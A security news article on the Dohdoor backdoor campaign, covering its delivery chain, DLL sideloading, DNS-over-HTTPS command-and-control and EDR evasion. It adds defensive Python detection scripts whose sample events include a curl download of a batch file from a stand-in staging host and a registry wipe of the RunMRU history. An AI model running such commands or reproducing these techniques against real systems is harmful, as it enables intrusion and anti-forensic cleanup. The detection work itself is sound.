A sophisticated new malware campaign, dubbed “Dohdoor,” is actively targeting U.S. educational and healthcare organizations. Since at least December 2025, threat actor UAT-10027 has been deploying this previously unknown backdoor malware, utilizing advanced stealth and multi-stage delivery tactics to achieve persistent access. The emergence of Dohdoor highlights a concerning trend of advanced threat actors targeting sectors handling sensitive data often with limited cybersecurity resources.
The malware’s name comes from its use of DNS-over-HTTPS (DoH) for command-and-control (C2) communications, turning a legitimate privacy protocol into a covert channel. By resolving its C2 hostnames through Cloudflare’s encrypted DNS service, Dohdoor makes its lookups appear as ordinary HTTPS connections to a widely used resolver instead of the plaintext DNS queries that a resolver log or DNS filter would normally see. The operators also use deceptive subdomain names such as “MswInSofTUpDloAd”, with irregular capitalization, under non-standard top-level domains; because DNS names are case-insensitive, the name still resolves, while case-sensitive string matching in automated filters can miss it.
Inside the Dohdoor Malware Attack Chain
Cisco Talos researchers have been tracking this unfolding campaign and attribute it to UAT-10027. The threat actor abuses legitimate Windows executables, known as living-off-the-land binaries (LOLBins), to sideload the Dohdoor DLL on compromised systems. The campaign’s infrastructure is built for anonymity, with C2 servers hidden behind Cloudflare’s network, which makes interception and blocking harder for defenders. Suspicious download telemetry first alerted Talos to this intrusion pattern, which specifically targets the education and healthcare sectors.
The initial infection vector is believed to be phishing emails that deliver a PowerShell script. When executed, the script calls the built-in `curl.exe` utility with an encoded URL to download a Windows batch file (`.bat` or `.cmd`) from a remote staging server, starting a multi-stage infection process designed to minimize detection at each step.
The Multi-Stage Infection Mechanism
The batch script serves a dual purpose as both dropper and cleanup tool. It creates a hidden working folder, typically under `C:\ProgramData` or `C:\Users\Public`, and downloads a malicious DLL into it under the name of a legitimate Windows system DLL, such as `propsys.dll` or `batmeter.dll`. It then copies legitimate Windows executables such as `Fondue.exe` and `mblctr.exe` into the same folder.
Because Windows searches an application’s own directory before the system directory for most DLLs, launching the copied executable from the working folder loads the malicious DLL beside it instead of the genuine one, a technique known as DLL sideloading. Once the malware is running, the batch script erases its own traces: it clears the Run-dialog history held in the `RunMRU` registry key, purges the clipboard, and deletes itself, an anti-forensic cleanup that leaves responders little to recover.
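The chain in the preceding paragraphs translates directly into host-based hunting logic. The following Python is an added example, not Cisco Talos code and not derived from the sample: it runs the described stages as detection rules over a handful of constructed Sysmon-style events (the event field names, the staging-folder name `Sys`, the staging URL, and the `reg.exe` form of the RunMRU wipe are all assumptions), and checks that the genuine `mblctr.exe` and `propsys.dll` in `System32` do not trigger.

```python
"""Hunting the Dohdoor delivery chain in constructed Sysmon-style events.

Added example: not Cisco Talos code and not derived from the sample. It
encodes the chain the article describes as detection logic:
  1. PowerShell driving curl.exe to fetch a .bat/.cmd file,
  2. a DLL named after a legitimate system DLL written to ProgramData or
     Users\\Public,
  3. a copied Windows executable (Fondue.exe / mblctr.exe) launched from
     that folder and loading the look-alike DLL (sideloading),
  4. RunMRU cleanup.
Event field names and the reg.exe form of the RunMRU wipe are assumptions.
"""
import re
from typing import Any, Dict, List, Tuple

SIDELOAD_HOSTS = {"fondue.exe", "mblctr.exe"}      # LOLBins named in the text
LOOKALIKE_DLLS = {"propsys.dll", "batmeter.dll"}   # real system DLL names it borrows
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
STAGING_DIRS = ("c:\\programdata\\", "c:\\users\\public\\")


def _norm(path: str) -> str:
    """Lower-case and normalise separators so prefix checks are reliable."""
    return path.lower().replace("/", "\\")


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def hunt(events: List[Dict[str, Any]]) -> List[Tuple[str, Dict[str, Any]]]:
    """Return (detection_tag, event) pairs for events matching a chain stage."""
    hits: List[Tuple[str, Dict[str, Any]]] = []
    for ev in events:
        kind = ev["event"]
        if kind == "process_create":
            image = _norm(ev["image"])
            name = _basename(image)
            parent = _basename(ev.get("parent_image", ""))
            cmd = ev.get("cmdline", "").lower()
            # Stage 1: PowerShell spawning curl.exe to pull a batch file.
            if name == "curl.exe" and parent == "powershell.exe" and re.search(r"\.(bat|cmd)\b", cmd):
                hits.append(("stage1_curl_batch_download", ev))
            # Stage 3: a sideload host binary running outside its system directory.
            if name in SIDELOAD_HOSTS and not image.startswith(SYSTEM_DIRS):
                hits.append(("stage3_lolbin_outside_system_dir", ev))
            # Cleanup: Run-dialog history (RunMRU) being deleted.
            if "runmru" in cmd and ("delete" in cmd or "remove-item" in cmd):
                hits.append(("cleanup_runmru_wipe", ev))
        elif kind == "file_create":
            target = _norm(ev["target"])
            # Stage 2: a look-alike DLL dropped into a staging folder.
            if _basename(target) in LOOKALIKE_DLLS and target.startswith(STAGING_DIRS):
                hits.append(("stage2_lookalike_dll_in_staging", ev))
        elif kind == "image_load":
            loaded = _norm(ev["image_loaded"])
            # Stage 3: the look-alike DLL loaded from anywhere but a system directory.
            if _basename(loaded) in LOOKALIKE_DLLS and not loaded.startswith(SYSTEM_DIRS):
                hits.append(("stage3_sideloaded_dll", ev))
    return hits


# Constructed events: five malicious steps followed by two benign look-alikes
# (the real binaries in their real locations) that must not fire.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": "C:\\Windows\\System32\\curl.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'curl.exe -s -o C:\\Users\\Public\\up.cmd "https://staging.example/s.cmd"'},
    {"event": "file_create", "image": "C:\\Windows\\System32\\curl.exe",
     "target": "C:\\ProgramData\\Sys\\propsys.dll"},
    {"event": "process_create", "image": "C:\\ProgramData\\Sys\\Fondue.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "Fondue.exe"},
    {"event": "image_load", "image": "C:\\ProgramData\\Sys\\Fondue.exe",
     "image_loaded": "C:\\ProgramData\\Sys\\propsys.dll"},
    {"event": "process_create", "image": "C:\\Windows\\System32\\reg.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f"},
    {"event": "process_create", "image": "C:\\Windows\\System32\\mblctr.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "mblctr.exe"},
    {"event": "image_load", "image": "C:\\Windows\\explorer.exe",
     "image_loaded": "C:\\Windows\\System32\\propsys.dll"},
]

if __name__ == "__main__":
    for tag, ev in hunt(SAMPLE_EVENTS):
        print(tag, "<-", ev.get("image"))
```

The strongest single signal here is the `image_load` rule: a DLL bearing a system DLL’s name loaded from a path outside `System32`/`SysWOW64` is rarely legitimate, whereas the other stages each have benign look-alikes (administrators do run `curl.exe` from PowerShell). Correlating two or more stages on the same host within a short window is what turns these into a high-confidence alert.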
With Dohdoor running, it resolves its C2 server’s IP address with DoH queries sent to Cloudflare over TCP port 443 and reads the address from the JSON answer the resolver returns. It then downloads an encrypted payload, decrypts it with a custom routine that combines XOR and subtraction with a position-dependent key, and injects the result into a freshly started legitimate Windows process such as `OpenWith.exe` or `wab.exe` by process hollowing (the process is created suspended, its image replaced in memory, and its thread resumed). Running inside a trusted process name helps the payload evade endpoint detection and response (EDR) tools.
To blind those tools further, Dohdoor overwrites the system-call stubs in its own copy of `ntdll.dll` with clean ones, removing the user-mode hooks that security products place there to monitor API calls. Cisco Talos assesses that the final payload is likely a Cobalt Strike Beacon, based on JA3S hashes (server-side TLS fingerprints) observed on the C2 infrastructure that match those associated with Cobalt Strike.
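The DoH resolution step described above, together with the case-mangled names mentioned earlier, can be illustrated from both sides. The Python below is an added example, not Dohdoor code or Talos tooling: it parses a response in the JSON format Cloudflare’s `dns-query` endpoint returns for `accept: application/dns-json` requests, which is the shape of answer the malware consumes, and then runs a small detector over constructed TLS-proxy log lines that flags DoH requests from processes not expected to use DoH and query names with irregular capitalization. The sample response, the log format, the process allow-list, the `.example` parent domain and the documentation address 203.0.113.10 are all constructed or assumed.

```python
"""DoH-based C2 resolution and its detection (added example, not Dohdoor code).

Part 1 parses the JSON answer Cloudflare's DoH endpoint returns for
GET https://cloudflare-dns.com/dns-query?name=<host>&type=A with
"accept: application/dns-json"; this is the response shape the article
says the malware reads its C2 address from.
Part 2 is a detector over constructed proxy log lines. The log format,
the process allow-list and all hostnames/addresses are assumptions.
"""
import json
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

DNS_TYPE_A = 1  # RR type code for an IPv4 address record


def a_records_from_doh_json(body: str) -> List[str]:
    """Return the IPv4 answers in a dns-json response, or [] if Status != 0 (NOERROR)."""
    doc = json.loads(body)
    if doc.get("Status", -1) != 0:
        return []
    return [rr["data"] for rr in doc.get("Answer", []) if rr.get("type") == DNS_TYPE_A]


# Constructed response in Cloudflare's dns-json layout. 203.0.113.10 is a
# documentation address standing in for a C2 server.
SAMPLE_DOH_RESPONSE = json.dumps({
    "Status": 0, "TC": False, "RD": True, "RA": True, "AD": False, "CD": False,
    "Question": [{"name": "MswInSofTUpDloAd.example.", "type": 1}],
    "Answer": [{"name": "mswinsoftupdload.example.", "type": 1, "TTL": 300,
                "data": "203.0.113.10"}],
})

# Cloudflare's public DoH endpoints (real hostnames) and a hypothetical
# allow-list of processes expected to speak DoH on a managed workstation.
DOH_HOSTS = {"cloudflare-dns.com", "mozilla.cloudflare-dns.com",
             "1.1.1.1", "1.0.0.1", "one.one.one.one"}
EXPECTED_DOH_CLIENTS = {"firefox.exe", "chrome.exe", "msedge.exe"}


def _mixed_case(name: str) -> bool:
    """DNS names are case-insensitive, so a client has no reason to send mixed case."""
    return any(c.isupper() for c in name) and any(c.islower() for c in name)


def flag_doh_requests(log_lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (process, query_name, reasons) for suspicious DoH requests.

    Each constructed line is "process<TAB>host<TAB>path", as a TLS-terminating
    proxy that records the originating process might log it.
    """
    findings: List[Tuple[str, str, List[str]]] = []
    for line in log_lines:
        process, host, path = line.rstrip("\n").split("\t")
        parts = urlsplit(path)
        if host.lower() not in DOH_HOSTS or not parts.path.startswith("/dns-query"):
            continue  # not a DoH request to a Cloudflare endpoint
        qname = parse_qs(parts.query).get("name", [""])[0]
        reasons = []
        if process.lower() not in EXPECTED_DOH_CLIENTS:
            reasons.append("doh_from_unexpected_process")
        if _mixed_case(qname):
            reasons.append("mixed_case_query_name")
        if reasons:
            findings.append((process, qname, reasons))
    return findings


# Constructed log: a hollowed OpenWith.exe resolving a case-mangled name,
# normal browser DoH, OpenWith.exe resolving a normal name, a browser
# resolving a mixed-case name, and unrelated HTTPS traffic.
SAMPLE_PROXY_LOG = [
    "OpenWith.exe\t1.1.1.1\t/dns-query?name=MswInSofTUpDloAd.example&type=A",
    "firefox.exe\tcloudflare-dns.com\t/dns-query?name=example.com&type=A",
    "OpenWith.exe\tcloudflare-dns.com\t/dns-query?name=example.com&type=A",
    "chrome.exe\t1.1.1.1\t/dns-query?name=SoMeThInG.example&type=A",
    "outlook.exe\tupdate.example\t/index.html",
]

if __name__ == "__main__":
    print(a_records_from_doh_json(SAMPLE_DOH_RESPONSE))
    for finding in flag_doh_requests(SAMPLE_PROXY_LOG):
        print(finding)
```

Two caveats for anyone deploying the detector side: the query name is only visible if the proxy terminates TLS (otherwise all a defender sees is a connection to 1.1.1.1:443, which is also what every Firefox install with DoH enabled produces), and the process attribution has to come from an endpoint agent, not the network. Without TLS inspection the practical control is the last recommendation in this article: block or redirect DoH resolvers at the egress so that the malware’s lookups either fail or fall back to DNS the organisation can log.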
Cisco Talos assesses with low confidence that UAT-10027 may be linked to North Korea’s Lazarus Group, based on overlapping decryption routines, NTDLL unhooking methods, and domain naming patterns. Organizations in the education and healthcare sectors are strongly advised to block or alert on unexpected LOLBin activity (for example, copies of system executables running outside their normal directories), to monitor for anomalous HTTPS traffic, including DoH connections from processes that have no reason to resolve names that way, and to deploy DNS security controls able to inspect or constrain DoH. Applying the ClamAV signatures and Snort rules published for this campaign can further aid detection and blocking of this evolving threat.